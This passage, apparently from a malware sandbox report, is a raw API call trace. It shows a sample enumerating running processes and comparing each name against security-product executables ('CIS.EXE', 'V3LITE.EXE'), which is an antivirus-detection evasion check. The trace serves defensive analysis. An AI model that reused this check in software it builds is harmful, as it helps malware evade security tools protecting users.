cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.249] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="CIS.EXE") returned 1 [0163.249] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.250] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.250] lstrlenW (lpString="svchost.exe") returned 11 [0163.250] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.250] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.250] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.250] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.250] lstrlenW (lpString="svchost.exe") returned 11 [0163.250] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.250] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.250] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.251] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.251] lstrlenW (lpString="winpoint.exe") returned 12 [0163.251] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.251] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="CIS.EXE") returned 1 [0163.251] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.252] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.252] lstrlenW (lpString="cmd.exe") returned 7 [0163.252] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.252] lstrcmpW (lpString1="CMD.EXE", lpString2="CIS.EXE") returned 1 [0163.252] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.253] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.253] lstrlenW (lpString="conhost.exe") returned 11 [0163.253] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.253] lstrcmpW (lpString1="CONHOST.EXE", lpString2="CIS.EXE") returned 1 [0163.253] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.253] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.253] lstrlenW (lpString="PING.EXE") returned 8 [0163.253] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.253] lstrcmpW (lpString1="PING.EXE", lpString2="CIS.EXE") returned 1 [0163.253] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.254] CloseHandle (hObject=0xe0) returned 1 [0163.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.256] lstrcpyW (in: lpString1=0x18f8e4, lpString2="V3LITE.EXE" | out: lpString1="V3LITE.EXE") returned="V3LITE.EXE" [0163.256] lstrlenW (lpString="V3LITE.EXE") returned 10 [0163.256] CharUpperBuffW (in: lpsz="V3LITE.EXE", cchLength=0xa | out: lpsz="V3LITE.EXE") returned 0xa [0163.256] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.257] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.257] lstrlenW (lpString="[System Process]") returned 16 [0163.257] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.257] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="V3LITE.EXE") returned -1 [0163.257] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.257] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.257] lstrlenW (lpString="System") returned 6 [0163.257] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.257] lstrcmpW (lpString1="SYSTEM", lpString2="V3LITE.EXE") returned -1 [0163.257] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.258] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.258] lstrlenW (lpString="smss.exe") returned 8 [0163.258] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.258] lstrcmpW (lpString1="SMSS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.258] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.259] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.259] lstrlenW (lpString="csrss.exe") returned 9 [0163.259] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.259] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.259] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.259] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.260] lstrlenW (lpString="wininit.exe") returned 11 [0163.260] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.260] lstrcmpW (lpString1="WININIT.EXE", lpString2="V3LITE.EXE") returned 1 [0163.260] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.260] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.260] lstrlenW (lpString="csrss.exe") returned 9 [0163.260] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.260] lstrcmpW (lpString1="CSRSS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.260] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.261] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.261] lstrlenW (lpString="winlogon.exe") returned 12 [0163.261] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.261] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="V3LITE.EXE") returned 1 [0163.261] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.262] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.262] lstrlenW (lpString="services.exe") returned 12 [0163.262] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.262] lstrcmpW (lpString1="SERVICES.EXE", lpString2="V3LITE.EXE") returned -1 [0163.262] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.262] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.262] lstrlenW (lpString="lsass.exe") returned 9 [0163.262] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.262] lstrcmpW (lpString1="LSASS.EXE", lpString2="V3LITE.EXE") returned -1 [0163.262] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.263] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.263] lstrlenW (lpString="lsm.exe") returned 7 [0163.263] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.263] lstrcmpW (lpString1="LSM.EXE", lpString2="V3LITE.EXE") returned -1 [0163.263] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.264] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.264] lstrlenW (lpString="svchost.exe") returned 11 [0163.264] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.264] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.264] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.265] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.265] lstrlenW (lpString="svchost.exe") returned 11 [0163.265] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.265] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.265] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.265] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.265] lstrlenW (lpString="svchost.exe") returned 11 [0163.265] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.265] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.265] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.266] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.266] lstrlenW (lpString="svchost.exe") returned 11 [0163.266] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.266] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.266] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.267] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.267] lstrlenW (lpString="svchost.exe") returned 11 [0163.267] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.267] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.267] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.268] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.268] lstrlenW (lpString="audiodg.exe") returned 11 [0163.268] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.268] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="V3LITE.EXE") returned -1 [0163.268] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.268] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.268] lstrlenW (lpString="svchost.exe") returned 11 [0163.268] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.268] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.269] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.269] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.269] lstrlenW (lpString="svchost.exe") returned 11 [0163.269] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.269] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.269] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.270] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.270] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.270] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.270] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="V3LITE.EXE") returned -1 [0163.270] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.271] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.271] lstrlenW (lpString="svchost.exe") returned 11 [0163.271] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.271] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.271] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.271] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.271] lstrlenW (lpString="taskhost.exe") returned 12 [0163.271] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.272] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.272] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.272] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.272] lstrlenW (lpString="taskeng.exe") returned 11 [0163.272] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.272] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3LITE.EXE") returned -1 [0163.272] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.273] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.273] lstrlenW (lpString="dwm.exe") returned 7 [0163.273] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.273] lstrcmpW (lpString1="DWM.EXE", lpString2="V3LITE.EXE") returned -1 [0163.273] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.274] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.274] lstrlenW (lpString="explorer.exe") returned 12 [0163.274] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.274] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="V3LITE.EXE") returned -1 [0163.274] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.274] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.274] lstrlenW (lpString="taskeng.exe") returned 11 [0163.274] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.274] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3LITE.EXE") returned -1 [0163.274] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.275] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.275] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.275] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.275] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="V3LITE.EXE") returned -1 [0163.275] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.276] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.276] lstrlenW (lpString="taskhost.exe") returned 12 [0163.276] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.276] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3LITE.EXE") returned -1 [0163.276] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.277] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.277] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.277] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.277] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="V3LITE.EXE") returned -1 [0163.277] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.277] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.277] lstrlenW (lpString="tri.exe") returned 7 [0163.277] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.277] lstrcmpW (lpString1="TRI.EXE", lpString2="V3LITE.EXE") returned -1 [0163.277] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.278] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.278] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.278] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.278] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="V3LITE.EXE") returned -1 [0163.278] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.279] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.279] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.279] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.279] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="V3LITE.EXE") returned -1 [0163.279] 